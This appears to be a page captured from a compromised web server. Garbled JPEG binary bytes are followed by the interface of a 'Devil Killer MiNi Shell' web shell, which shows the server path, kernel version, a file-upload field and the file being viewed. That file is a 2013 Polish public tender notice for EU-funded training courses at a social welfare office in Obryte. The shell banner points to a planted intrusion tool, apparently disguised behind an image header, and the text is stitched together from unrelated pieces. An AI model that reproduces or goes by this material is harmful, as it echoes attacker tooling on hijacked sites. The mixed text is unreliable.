JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130522/84647-N-2013.html

<p class="kh_header"><b>Obryte: Organizacja i przeprowadzenie kursów dla Ośrodka Pomocy Społecznej w Obrytem w ramach projektu pt: Razem i Aktywnie  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 84647 - 2013; data zamieszczenia: 22.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , Obryte 185, 07-215 Obryte, woj. mazowieckie, tel. 29 74 11 105, faks 29 74 11 105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.obryte.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.obryte.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów dla Ośrodka Pomocy Społecznej w Obrytem w ramach projektu pt: Razem i Aktywnie  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia:
Organizacja i przeprowadzenie kursów dla Ośrodka Pomocy Społecznej
w Obrytem  ramach projektu pt: Razem i Aktywnie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
PROGRAM OPERACYJNY - KAPITAŁ LUDZKI - RAZEM i AKTYWNIE
Tytuł projektu - Razem i Aktywnie
Priorytet VII. Promocja integracji społecznej
Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji
Poddziałanie 7.1.1 Programu Operacyjnego Kapitał Ludzki Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego.
2.Zamawiający dopuszcza złożenie ofert częściowych. Wykonawca może złożyć w prowadzonym postępowaniu  ofertę na wszystkie części lub  na wybrane części.
3.Zamawiający podzielił zamówienie na 3 części, a mianowicie:
Część I
Zadanie 1: Porady psychologiczne 
Ilość  osób 	9 osób
Ilość godzin dydaktycznych (1 godzina=
45min)	67 godzin w tym: 18 godzin z doradztwa zawodowego  i 49 godzin zajęć warsztatów psychologicznych ( dla 9 osób po 5 godz, warsztatów indywidualnych oraz 4 godz. zajęć grupowych).

Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć	VII-2013  do XI-2013r.
Program powinien zawierać
wskazane poniżej minimum
programowe	Budowanie poczucia własnej wartości: 
a) Czym jest poczucie własnej wartości. 
b) Wpływ samooceny na nasze życie. 
c) Sposoby na podniesienie poczucia własnej wartości. 
d) Wzmocnienie wiary we własne możliwości. 
Kształtowanie postawy asertywnej: 
a) Czym jest asertywność. 
b) Asertywne przyjmowanie ocen.
c) Przyjęcie aktywnej postawy w pokonywaniu życiowych trudności. 

Efektywna komunikacja: 
a) Charakterystyka procesu komunikacji. 
b) Techniki i metody efektywnej komunikacji w relacjach i kontaktach międzyludzkich. 
c) Komunikacja werbalna i niewerbalna. 
d) Diagnoza swojego stylu komunikacji. 
e) Sztuka słuchania i analizowania wypowiedzi. 
f) Komunikacja asertywna. 
Naukę radzenie sobie ze stresem: 
a) Mechanizm oddziaływania stresu na organizm. 
b) Uświadomienie uczestnikom indywidualnej podatności i odporności na stres. 
c) Odporność i radzenie sobie ze stresem. 
d) Sposoby optymalnego reagowania na bierność i agresję. 
Doradztwo zawodowe:
      a) udzielaniu niezbędnych informacji o zawodach, rynku pracy oraz      możliwościach kształcenia i szkolenia,
      b) udzielaniu pomocy w formie indywidualnych i grupowych porad zawodowych,
      c) określaniu predyspozycji zawodowych,
Materiały szkoleniowe Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych  na kursie barek kawowy dla każdego uczestnika kursu zawodowego. 
Część II
ZADANIE 1. Obsługa kasy fiskalnej + obsługa komputera z elementami komputerowego wspierania firmy.
Ilość osób	3 osoby
Ilość godzin dydaktycznych (1 godzina=
45min)	80 godzin w tym: 20 godzin zajęć teoretycznych i 60 godzin zajęć
praktycznych.
30 godzin kasy fiskalnej
50 godzin obsługi komputera
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć 	VII-2013  do XI-2013r.
Program powinien zawierać
wskazane poniżej minimum
programowe	Kasa fiskalna
1. Znaczenie i funkcje kasy fiskalnej
2. Wygląd kasy i opis klawiatury
3. Uruchomienie kasy i wymiana papieru
4. Zasady sprzedaży
5.Sporzadzanie raportów, faktur, rachunku
6.Obsługa programu do fakturowania
7. Zajęcia praktyczne na kasach fiskalnych
Obsługa komputera
1. Obsługa oprzyrządowania komputerowego.
- budowa komputera, prawidłowe uruchamianie i wyłączanie
komputera,
- urządzenia peryferyjne,
- typy drukarek,
- zastosowanie skanera,
- porty we/wy, sposoby podłączenia urządzeń peryferyjnych.
2. System operacyjny Windows.
- funkcje systemu,
-  funkcje pulpitu Windows,
-  uruchamianie programów,
-  programy instalowane podczas systemu operacyjnego,
-  opis panelu sterowania,
- przeglądanie zasobów komputera.
3. Administrowanie danymi.
-  operacje na plikach i folderach,
- tworzenie oraz kasowanie, folderów, plików,
- kopiowanie, przenoszenie, wklejanie plików, folderów,
-  kosz systemowy.
4. Edytor tekstu (Microsoft Word).
-  zastosowanie i funkcje programu,
- elementy okna programu,
- wpisywanie i edycja tekstu,
-  wstawianie grafiki, tabel, symboli do dokumentu,
-  formatowanie dokumentu (czcionki, rozmiaru, koloru, akapitów,
tabulatorów),
- opcje oraz drukowanie dokumentów.
5. Arkusz kalkulacyjny excel
- zastosowanie oraz funkcje programu,
- poruszanie się po arkuszu,
-  wprowadzanie i zmiana danych,
-  wykonywanie obliczeń, tworzenie wykresów,
-  drukowanie arkusza.
6. Internet, poczta elektroniczna, komunikatory internetowe.
- umiejętność korzystania z przeglądarek internetowych IE,
Firefox, Opera),
- wyszukiwanie danych w globalnej sieci,
- poczta elektroniczna: m. in. Outlook, zakładanie oraz
korzystanie z konta e-mail (wysyłanie i odbieranie
korespondencji),
-  ogólna wiedza nt: komunikatorów internetowych (zakładanie
kont, komunikacja, itp.).
Programy użytkowe w firmie:
- zasady działania i pracy z programami użytkowymi firmy, 
- ćwiczenia na programach użytkowych wspomagających pracę firmy.
Materiały szkoleniowe Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych  na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego. 


Zadanie 2: Opiekunka osób starszych i dzieci
Ilość osób	1 osoba
Ilość godzin dydaktycznych
(1 godzina=45min)	60 godzin
Dojazd do miejsca realizacji kursu
	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Termin zajęć	VII -2013r. do XI- 2013 r.
Program powinien zawierać
wskazane poniżej minimum programowe	1. Sylwetka zawodowa opiekuna osoby starszej: rola i zadania
opiekuna osób i formy opieki
2. Fizjologiczne i psychologiczne aspekty starzenia się.
3. Choroby wieku podeszłego, obserwacja podopiecznego, pomiar i
analiza parametrów.
4. Organizacja opieki zdrowotnej i pomocy społecznej (na terenie UE).
5. Pierwsza pomoc w nagłych przypadkach
6. Budowanie relacji z podopiecznym i jego rodziną
7. Pielęgnacja osób starszych i przewlekle chorych.
8. Postępowanie w wybranych problemach zdrowotnych.
9. Terapia zajęciowej, fizjoterapia, rehabilitacja
10. Wybrane zagadnienia farmakoterapii
11. Zasady żywienia ludzi chorych, starszych i niepełnosprawnych.
Dzieci
Podstawowe zagadnienia dotyczące rozwoju i wychowania dziecka
Podstawy psychologii rozwojowej
Zasady i metody wychowania dziecka
Rozpoznawanie i zaspokajanie potrzeb dziecka
Wpływ zabawy na rozwój dziecka
Przygotowanie i dobór pomocy do zabaw
Rodzaje i propozycje zajęć
Potrzeby biologiczne małego dziecka
Choroby wieku dziecięcego w pigułce - rola opiekunki dziecięcej
Opieka nad chorym dzieckiem
Żywienie niemowląt i małych dzieci
Pierwsza pomoc dzieciom w nagłych wypadkach
Wypoczynek a rozwój małego dziecka - spacer, hartowanie, sen
Kąpiel i pielęgnacja skóry dziecka 1 - 3 rok życia
Nagła śmierć łóżeczkowa - jak jej zapobiec?
Materiały
szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę
wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie
materiały dla beneficjentów musza zawierać logotypy) oraz musi
otrzymać na własność: program kursu i harmonogram zajęć, materiały
szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych  na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego. 
Zadanie 3: Prawo jazdy kat. B
Ilość osób	2 osoby
Ilość godzin dydaktycznych
(1 godzina=45min)	60 godzin na jedną osobę
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć	VII- 2013r. do XI- 2013 r.
Program powinien zawierać wskazane poniżej minimum programowe	Program szkolenia teoretycznego
- Budowa, obsługa i eksploatacja samochodu osobowego
- Ogólne zasady poruszania się samochodem po drodze:
zachowanie ostrożności i właściwej postawy w stosunku do innych uczestników ruchu drogowego
- Zasady zachowania bezpiecznych odległości między pojazdami
- Środki wpływające na percepcję i szybkość reakcji (alkohol,
narkotyki, leki), wpływ zmęczenia i stanu emocjonalnego na
zachowanie kierowcy
- Ocena warunków na drodze - warunki atmosferyczne,
widoczność, nawierzchnia, bezpieczna jazda samochodem w różnych warunkach
- Bezpieczne przewożenie pasażerów dorosłych i dzieci
- Znaki drogowe
- Ruszanie, włączanie się do ruchu, zatrzymanie, postój
- Manewry (wyprzedzanie, omijanie, wymijanie, zmiana pasa ruchu)
- Skrzyżowania, ronda, ruch kierowany
- Używanie świateł pojazdu
- Dokumentacja pojazdu, kontrola drogowa
- Udzielanie pierwszej pomocy
- Zasady postępowania w razie uczestniczenia w wypadku lub kolizji drogowej
- Błędy najczęściej popełniane przez kierowców
- Przygotowanie do egzaminu teoretycznego
- Egzamin wewnętrzny
Program szkolenia praktycznego
- Budowa i obsługa samochodu
- Przygotowanie do jazdy, ruszanie, zatrzymanie, zmiana biegów
- Zmiana kierunku jazdy, cofanie
- Obsługa świateł
- Plac manewrowy - ćwiczenie umiejętności manewrowania pojazdem
- Jazda w terenie (dostosowanie prędkości do warunków na drodze, hamowanie awaryjne, bieg 5 i 6)
- Jazda w ruchu ulicznym (pasy ruchu, skrzyżowania, ronda, obserwowanie i przewidywanie działań innych uczestników
ruchu)
- Manewry w ruchu ulicznym (wyprzedzanie, omijanie, wymijanie, parkowanie)
- Jazda sportowa (wychodzenie z poślizgu, ostre wchodzenie w zakręty)
- Jazda z nawigacją
- Stacja benzynowa (tankowanie benzyny, oleju napędowego, gazu)
- Stacja kontroli pojazdów
- Czynności kontrolne na drodze
- Awaria na drodze (diagnostyka, zmiana koła, uzupełnienie płynów eksploatacyjnych)
- Plac manewrowy - przygotowanie do egzaminu
- Trasy egzaminacyjne - przygotowanie do egzaminu
- Egzamin wewnętrzny
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie
materiały dla beneficjentów musza zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały
szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały
biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego. 

Część III zamówienia
Zadanie 1:  Spawanie blach i rur spoinami pachwinowymi i czołowymi metodą MAG (135)
Ilość osób 	1 osoba
Ilość godzin dydaktycznych
(1 godzina= 45min)	Łączna liczba godzin szkolenia: 302 godz. (godzina kursu liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę liczącą 15 minut)
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjenta do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć	VII- 2013r. do XI -2013 r.
Program
powinien zawierać
wskazane poniżej
minimum programowe	Spawanie blach i rur spoinami pachwinowymi
1. Zastosowanie elektryczności do spawania łukowego.
2. Urządzenia spawalnicze.
3. Bezpieczeństwo i higiena pracy.
4. Bezpieczna praca na hali produkcyjnej.
5. Materiały dodatkowe do spawania.
6. Spawanie w praktyce.
7. Oznaczenie i wymiarowanie spoin.
8. Metody przygotowania złączy do spawania.
9. Kwalifikowanie spawaczy.
10. Zajęcia praktyczne.
Spawanie blach i rur spoinami czołowymi
1. Wprowadzenie do zagadnień wytwarzania stali.
2. Złącza spawane blach i rur.
3. Spawalność stali.
4. Skurcz, naprężenie i odkształcenia.
5. Niezgodności spawalnicze.
6. Przegląd procesów spawania.
7. Bezpieczna praca na montażu.
8. Kontrola i badania.
9. Zapewnienie jakości w spawalnictwie.
10. Zajęcia praktyczne.

Zaświadczenia/certyfikaty

	Na potwierdzenie zdobytych kwalifikacji uczestnik otrzymuje świadectwo egzaminu kwalifikacyjnego spawacza (certyfikat) oraz wpis do książki wydanej przez Instytut Spawalnictwa w Gliwicach. Wykonawca wyda uczestnikowi, który ukończy szkolenie zaświadczenie
informujące o uczestnictwie w szkoleniu współfinansowanym ze środków Unii
Europejskiej w ramach Europejskiego Funduszu Społecznego, oznakowanych zgodnie
z wytycznymi dotyczącymi oznakowywania projektów w ramach POKL 2007-2013. Treść zaświadczenia zostanie uzgodniona z Zamawiającym,
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów musza zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)

Warunki szkolenia
	Wykonawca prowadzi dokumentację z  zajęć w tym : dziennika zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, list
potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu,
Wykonawca  prowadzi zajęcia zgodnie z przepisami bhp w tym zakresie,
Wykonawca zapewni uczestnikom kursu odzież ochronną, jeżeli konieczność taka wynika z obowiązujących przepisów bhp. 
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego.
Ubezpieczenie	Wykonawca ubezpieczy uczestnika  na czas trwania szkolenia od następstw nieszczęśliwych wypadków (NNW).

Zadanie 2 :Operator koparko-ładowarki  
Ilość osób	2 osoby
Ilość godzin dydaktycznych
(1 godzina=45min)	Łączna liczba godzin szkolenia: 176 godz. dla jednego uczestnika szkolenia (godzina kursu liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę liczącą 15 minut)

Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Program powinien zawierać
wskazane poniżej minimum
programowe	Program szkolenia powinien obejmować następujące zagadnienia:
1) użytkowanie eksploatacyjne,
2) dokumentacja techniczna,
3) bezpieczeństwo i higiena pracy,
4) podstawy elektrotechniki,
5) silniki spalinowe,
6) elementy hydrauliki,
7) budowa koparko-ładowarki,
8) technologia robót,
9) zajęcia praktyczne.
Warunki szkolenia
	Wykonawca prowadzi dokumentację z  zajęć w tym : dziennika zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, listy    potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu,
Wykonawca  prowadzi zajęcia zgodnie z przepisami bhp w tym zakresie.
Wykonawca zapewni uczestnikom kursu odzież ochronną, jeżeli konieczność taka wynika z obowiązujących przepisów bhp. 
 
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego.
Ubezpieczenie	Wykonawca ubezpieczy uczestnika  na czas trwania szkolenia od następstw nieszczęśliwych wypadków (NNW).
UWAGA do wszystkich części zamówienia.
Do ceny ofertowej należy wkalkulować koszt wykonania dla każdego uczestnika
BADAŃ  LEKARZA  MEDYCYNY  PRACY oraz innych badań niezbędnych do
przeprowadzenia kursu.
Wykonawca będzie prowadził bieżącą dokumentację kursu, tj. imienną listę
obecności, dziennik zajęć, imienną listę odbioru materiałów szkoleniowych, protokoły
z egzaminów, ankiety ewaluacyjne do każdego zadania (zał. Nr 7). Kurs powinien zakończyć się wydaniem zaświadczenia o ukończeniu (dotyczy kursów z wymiarem min. 30 godzin lekcyjnych),zaświadczenia opatrzone informacją o współfinansowaniu oraz logo UE, EFS, PO KL.
Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii
zaświadczeń potwierdzonych za zgodność z oryginałem i listy potwierdzającej odbiór
w/w zaświadczeń lub certyfikatów. Wykonawca przekaże Zamawiającemu zdjęcia -
fotografie z przeprowadzonego kursu w ilości minimum 20 zdjęć na płycie CD/DVD. Wykonawca zrealizuje kurs w oparciu o program szkolenia spełniający
zasady i warunki podnoszenia kwalifikacji zawodowych i wykształcenia
ogólnego osób dorosłych, a także spełniający określone dla tych zawodów
standardy kwalifikacji i szkolenia.
Do realizacji kursu Wykonawca musi zapewnić uczestnikom wszelkie
niezbędne i odpowiednie materiały szkoleniowe (np. prezentacje, sprzęt,
pomoce dydaktyczne). Materiały szkoleniowe muszą być adekwatne do treści
kursu i opatrzone informacją o współfinansowaniu, flagą UE oraz logo
Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem
Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w
ramach PO KL). Materiały powinny być przekazane każdemu uczestnikowi za  pokwitowaniem na początku szkolenia, bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz całości materiałów szkoleniowych Wykonawca zobowiązany jest przekazać Zamawiającemu.
Wykonawca ponosi wszelkie koszy związane z opłatą za egzaminy oraz
inne  koszty niezbędne do prawidłowego wykonania zamówienia .W/w koszty  proszę wkalkulować w cenę oferowaną..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie  spełniony na podstawie złożonego  oświadczenia z art.22.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert  o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których  usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, tj., warunek ten uznaje się za spełniony jeżeli wykaz będzie zawierał co najmniej 1 usługę o wartości minimum 5.000,00 zł., w zakresie prowadzenia szkoleń  o tematyce zawartej w przedmiocie zamówienia .
Wykaz może być przedstawiony jako poświadczenie, z tym że w odniesieniu do nadal wykonywanych  usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania  ofert; - załącznik Nr  4  do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie  spełniony na podstawie złożonego  oświadczenia , że osoby uczestniczące w wykonywaniu zamówień posiadają wymagane uprawnienia - zał. nr 5,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
